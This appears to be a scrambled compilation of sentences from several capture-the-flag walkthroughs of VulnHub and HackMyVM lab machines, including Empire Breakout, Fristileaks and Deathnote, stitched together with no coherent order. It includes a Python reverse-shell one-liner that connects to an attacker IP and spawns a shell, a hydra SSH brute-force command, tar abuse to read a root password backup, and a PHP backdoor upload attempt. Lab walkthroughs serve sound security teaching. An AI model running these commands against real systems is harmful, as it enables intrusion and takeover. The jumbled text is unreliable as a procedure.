Port 80 is being used for the HTTP service, and port 22 is being used for the SSH service. Hydra is one of the best tools available in Kali Linux to run brute force on different protocols and ports. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for protecting yourself and your network. It tells Nmap to conduct the scan on all the 65535 ports on the target machine. It is a Linux-based machine. This means that we can read files using tar. We ran some commands to identify the operating system and kernel version information. In the next step, we used the WPScan utility for this purpose. Other than that, let me know if you have any ideas for what else I should stream! We used the find command to check for weak binaries; the command's output can be seen below. The target machine IP address may be different in your case, as the network DHCP is assigning it. In the Nmap command, we used the -sV option for version enumeration and -p- for a full port scan, which means we are telling Nmap to conduct the scan on all 65535 ports. Series: Fristileaks. As the content is in ASCII form, we can simply open the file and read the file contents. sudo arp-scan 10.0.0.0/24 The IP address of the target is 10.0.0.83. Scan open ports. However, upon opening the source of the page, we see a brainf#ck cypher. We can use this guide on how to break out of it: Breakout restricted shell environment rbash | MetaHackers.pro. As a hint, it is mentioned that this is a straightforward box, and we need to follow the hints while solving this CTF. Testing the password for fristigod with LetThereBeFristi! The output of the Nmap shows that two open ports have been identified as open in the full port scan. The ping response confirmed that this is the target machine IP address. Also, check my walkthrough of DarkHole from Vulnhub.
Note: the target machine IP address may be different in your case, as the network DHCP is assigning it. Deathnote is an easy machine from VulnHub and is based on the anime "Deathnote". The identified open ports can also be seen in the screenshot given below: Command used: << nmap 192.168.1.60 -sV -p- >>. We have WordPress admin access, so let us explore the features to find any vulnerable use case. Trying with username eezeepz and password discovered above, I was able to log in and was then redirected to an image upload directory. We do not understand the hint message. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets. Symfonos 2 is a machine on VulnHub. Greetings! We got the below password. We decided to enumerate the system for known usernames. The next step is to scan the target machine using the Nmap tool. A Kali Linux VM will be my attacking box. We started enumerating the web application and found an interesting hint hidden in the HTML source code. We will be using 192.168.1.23 as the attacker's IP address. It was in the robots directory. First, we need to identify the IP of this machine. Enumerating HTTP Port 80 with Dirb utility, Taking the Python reverse shell and user privilege escalation.
After completing the scan, we identified one file that returned 200 responses from the server. There are enough hints given in the above steps. The Dirb scan generated some useful results. The command used for the scan and the results can be seen below. https://download.vulnhub.com/empire/02-Breakout.zip. We used the su command to switch the current user to root and provided the identified password. flag1. We have enumerated two usernames on the target machine, l and kira.
We have added these in the user file. Matrix 2: Vulnhub Lab Walkthrough March 1, 2019 by Raj Chandel. Today we are going to solve another Boot2Root challenge "Matrix 2". We can decode this from the site dcode.fr to get a password-like text. There is a default utility known as enum4linux in Kali Linux that can be helpful for this task. Unfortunately nothing was of interest on this page as well. Have a good day. Hello, my name is Elman. So, let us open the identified directory manual on the browser, which can be seen below. The ping response confirmed that this is the target machine IP address. The online tool is given below. Let us open each file one by one on the browser. To my surprise, it did resolve, and we landed on a login page. python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.8.128",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")', $ python3 -c 'import pty; pty.spawn("/bin/bash")', [cyber@breakout ~]$ ./tar -cf password.tar /var/backups/.old_pass.bak, [cyber@breakout backups]$ cat .old_pass.bak. This means that the HTTP service is enabled on the Apache server. Command used: << wget http://192.168.1.15/~secret/.mysecret.txt >>. Navigating to the eezeepz user directory, we can see another notes.txt, and its contents are listed below. Description: A small VM made for a Dutch informal hacker meetup called Fristileaks. So, it is very important to conduct the full port scan during the pentest or while solving the CTF. Please try to understand each step. Until then, I encourage you to try to finish this CTF! We will use the FFUF tool for fuzzing the target machine. On the home directory, we can see a tar binary. Also, this machine works on VirtualBox. Command used: << dirb http://192.168.1.15/ >>. After getting the target machine's IP address, the next step is to find out the open ports and services available on the machine.
My goal in sharing this writeup is to show you the way if you are in trouble. Once logged in, there is a terminal icon on the bottom left. VulnHub Sunset Decoy Walkthrough - Conclusion. I wish you a good day. cyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bak, cyber@breakout:~$ cat var/backups/.old_pass.bak. So, we continued exploring the target machine by checking various files and folders for some hint or loophole in the system. We opened the target machine IP address on the browser. If we look at the bottom of the page's source code, we see a text encrypted by the brainfuck algorithm. In this case, I checked its capability. So, we ran the WPScan tool on the target application to identify known vulnerabilities. We used the ping command to check whether the IP was active. Now, we have all the information that is required. Sticking to the goal and following the same pattern of key files, we ran a quick check across the file system with a command like find / -name key-2-of-3.txt. Command used: << hydra -L user -P pass 192.168.1.16 ssh >>. Name: Empire: Breakout Date release: 21 Oct 2021 Author: icex64 & Empire Cybersecurity Series: Empire. Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. However, for this machine it looks like the IP is displayed in the banner itself. So following the same methodology as in Kioptrix VMs, let's start nmap enumeration. So, we used the sudo su command to switch the current user to root. The second step is to run a port scan to identify the open ports and services on the target machine. We have to boot to its root and get the flag in order to complete the challenge. Just above this string there was also a message by eezeepz. Prior versions of bmap are known to this escalation attack via the binary interactive mode. By default, Nmap conducts the scan only on known 1024 ports. So let's pass that to wpscan and let's see if we can get a hit.
For hints, Discord server ( https://discord.gg/7asvAhCEhe ). Before we trigger the above template, we'll set up a listener. There are numerous tools available for web application enumeration. Getting the IP address with the Netdiscover utility, Escalating privileges to get the root access. Robot VM from the above link and provision it as a VM. We used the ls command to check the current directory contents and found our first flag. The hydra scan took some time to brute force both the usernames against the provided word list. After running the downloaded virtual machine in the virtual box, the machine will automatically be assigned an IP address from the network DHCP. This box was created to be an Easy box, but it can be Medium if you get lost. The torrent downloadable URL is also available for this VM; it has been added in the reference section of this article. Style: Enumeration/Follow the breadcrumbs. Let's start with enumeration. Port 80 open. Here we will be running the brute force on the SSH port that can be seen in the following screenshot. So, we identified a clear-text password by enumerating the HTTP port 80. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets. At first, we tried our luck with the SSH login, which did not work. A large output has been generated by the tool. When we look at port 20000, it redirects us to the admin panel with a link. By default, Nmap conducts the scan on only known 1024 ports. Command used: << enum4linux -a 192.168.1.11 >>. The initial try shows that the docom file requires a command to be passed as an argument.
For those who are not aware of the site, VulnHub is a well-known website for security researchers which aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. This step will conduct a fuzzing scan on the identified target machine. CORROSION: 1 Vulnhub CTF walkthrough, part 1 January 17, 2022 by LetsPen Test. The goal of this capture the flag is to gain root access to the target machine. The target machine IP address is 192.168.1.60, and I will be using 192.168.1.29 as the attacker's IP address. I hope you liked the walkthrough. So, it is very important to conduct the full port scan during the pentest or while solving the CTF. In CTF challenges, whenever I see a copy of a binary, I check its capabilities and SUID permission. Doubletrouble 1 walkthrough from VulnHub. As can be seen in the above screenshot, our attacker machine successfully captured the reverse shell after some time. Let us start enumerating the target machine by exploring the HTTP service through the default port 80. https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip. We opened the target machine IP address on the browser as follows: The webpage shows an image on the browser. There was a login page available for the Usermin admin panel. The root flag was found in the root directory, as seen in the above screenshot. We used the Dirb tool; it is a default utility in Kali Linux. Welcome to the write-up of the new machine Breakout by icex64 from the HackMyVM platform. Name: Empire: LupinOne Date release: 21 Oct 2021 Author: icex64 & Empire Cybersecurity Series: Empire. Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Please note: I have used Oracle Virtual Box to run the downloaded machine for all of these machines.
As seen in the above screenshot, the image file could not be opened on the browser as it showed some errors. However, in the current user directory we have a password-raw md5 file. The second step is to run a port scan to identify the open ports and services on the target machine. However, due to the complexity of the language and the use of only special characters, it can be used for encoding purposes. I have. We do not know yet), but we do not know where to test these. After running the downloaded virtual machine file in the virtual box, the machine will automatically be assigned an IP address from the network DHCP, and it will be visible on the login screen. (Remember, the goal is to find three keys.) We got one of the keys! We changed the URL after adding the ~secret directory in the above scan command. Defeat all targets in the area. We have identified an SSH private key that can be used for SSH login on the target machine. Keep practicing by solving new challenges, and stay tuned to this section for more CTF solutions. Continuing with our series on interesting Vulnhub machines, in this article we will see a walkthrough of the machine entitled Mr. Nmap also suggested that port 80 is also opened. Since we can use the command with 'sudo' at the start, we can execute the shell as root, giving us root access to the . WPScanner is one of the most popular vulnerability scanners to identify vulnerabilities in WordPress applications, and it is available in Kali Linux by default. The website can be seen below. As shown in the above screenshot, we got the default Apache page when we tried to access the IP address on the browser. We ran the id command to check the user information. While exploring the admin dashboard, we identified a notes.txt file uploaded in the media library. Please note: I have used Oracle Virtual Box to run the downloaded machine for all of these machines.
As we know, the SSH default port is open on the target machine, so let us try to log in through the SSH port. Below are the nmap results of the top 1000 ports. Walkthrough. The second step is to run a port scan to identify the open ports and services on the target machine. So, let us run the above payload in the target machine terminal and wait for a connection on our attacker machine. We can conduct a web application enumeration scan on the target machine's IP address to identify the hidden directories and files accessed through the HTTP service. Pre-requisites would be knowledge of Linux commands and the ability to run some basic pentesting tools. However, for this machine it looks like the IP is displayed in the banner itself. I tried to directly upload the PHP backdoor shell, but it looks like there is a filter to check for extensions. You play Trinity, trying to investigate a computer on the Nebuchadnezzar that Cypher has locked everyone else out from, which holds the key to a mystery. It is especially important to conduct a full port scan during the pentest or while solving the CTF for maximum results. EMPIRE: BREAKOUT Vulnhub Walkthrough In English. Details: In this, I am using the Kali Linux machine as an attacker machine and the target machine is. The CTF or Check the Flag problem is posted on vulnhub.com. By default, Nmap conducts the scan only on known 1024 ports. The string was successfully decoded without any errors. The identified directory could not be opened on the browser.
VM LINK: https://download.vulnhub.com/empire/02-Breakout.zip, http://192.168.8.132/manual/en/index.html. I have used Oracle Virtual Box to run the downloaded machine for all of these machines. It can be used for finding resources that are not linked (directories, servlets, scripts, etc.). The comment left by a user named L contains some hidden message which is given below for your reference. The hint mentions an image file that has been mistakenly added to the target application. "Writeup - Breakout - HackMyVM - Walkthrough" Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Breakout Identify the target. As usual, I started the exploitation by identifying the IP address of the target. The scan command and results can be seen in the following screenshot. After running the downloaded virtual machine in the virtual box, the machine will automatically be assigned an IP address from the network DHCP. The file was also mentioned in the hint message on the target machine. Thus obtained, the clear-text password is given below for your reference: We enumerated the web application to discover other vulnerabilities or hints, but nothing else was there. nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.26 Nmap scan result: There is only an HTTP port to enumerate. Prerequisites would be knowledge of Linux commands and the ability to run some basic pentesting tools.
The password was stored in clear-text form. We used the cat command to save the SSH key as a file named key on our attacker machine. I still plan on making a ton of posts but let me know if these VulnHub write-ups get repetitive.